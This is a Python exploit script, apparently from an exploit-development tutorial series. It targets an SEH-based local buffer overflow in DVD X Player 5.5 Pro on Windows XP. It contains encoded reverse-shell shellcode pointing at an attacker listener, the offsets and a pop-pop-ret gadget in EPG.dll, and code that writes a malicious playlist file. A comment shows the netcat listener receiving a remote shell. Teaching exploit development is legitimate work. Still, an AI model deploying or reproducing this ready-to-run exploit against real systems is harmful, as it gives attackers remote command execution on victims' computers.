#!/usr/bin/python -w #----------------------------------------------------------------------------------# # Exploit: DVD X Player 5.5 Pro SEH (local BOF) # # OS: Tested XP PRO SP3 (EPG.dll should be universal) # # Author: b33f (Ruben Boonen) # # Software: http://www.exploit-db.com/wp-content/themes/exploit/applications # # /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe # #----------------------------------------------------------------------------------# # This exploit was created for Part 3 of my Exploit Development tutorial series... # # http://www.fuzzysecurity.com/tutorials/expDev/3.html # #----------------------------------------------------------------------------------# # root@bt:~# nc -lvp 9988 # # listening on [any] 9988 ... # # 192.168.111.128: inverse host lookup failed: Unknown server error # # connect to [192.168.111.132] from (UNKNOWN) [192.168.111.128] 1044 # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # G:\tutorial>ipconfig # # ipconfig # # # # Windows IP Configuration # # # # # # Ethernet adapter Local Area Connection: # # # # Connection-specific DNS Suffix . : localdomain # # IP Address. . . . . . . . . . . . : 192.168.111.128 # # Subnet Mask . . . . . . . . . . . : 255.255.255.0 # # Default Gateway . . . . . . . . . : # # # # G:\tutorial> # #----------------------------------------------------------------------------------# filename="evil.plf" #---------------------------------------------------------------------------------------------------------------# # msfpayload windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c # # [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) # #---------------------------------------------------------------------------------------------------------------# shellcode = ( "\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8" "\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1" "\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5" "\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44" "\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b" "\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e" "\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3" "\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c" "\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30" "\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22" "\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d" "\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e" "\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c" "\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c" "\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6" "\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde" "\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b" "\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17" "\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68" "\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71" "\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff" "\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54") #----------------------------------------------------------------------------------# # (*) badchars = '\x00\x0A\x0D\x1A' # # # # offset to: (2) nseh 608-bytes, (1) seh 112-bytes # # (2) nseh = '\xEB\x06' => jump short 6-bytes # # (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll # # (3) shellcode space = 1384-bytes # #----------------------------------------------------------------------------------# # SEH Exploit Structure: # # \----------------> # # [AAA..................AAA] [nseh] [seh] [BBB..................BBB] # # \--------------------------------------> # # <-------/ # # (1) Initial EIP overwrite, SEH leads us back 4-bytes to nSEH # # (2) nSEH jumps over SEH and redirects execution to our B's # # (3) We place our shellcode here ... Game Over! # #----------------------------------------------------------------------------------# evil = "\x90"*20 + shellcode buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close()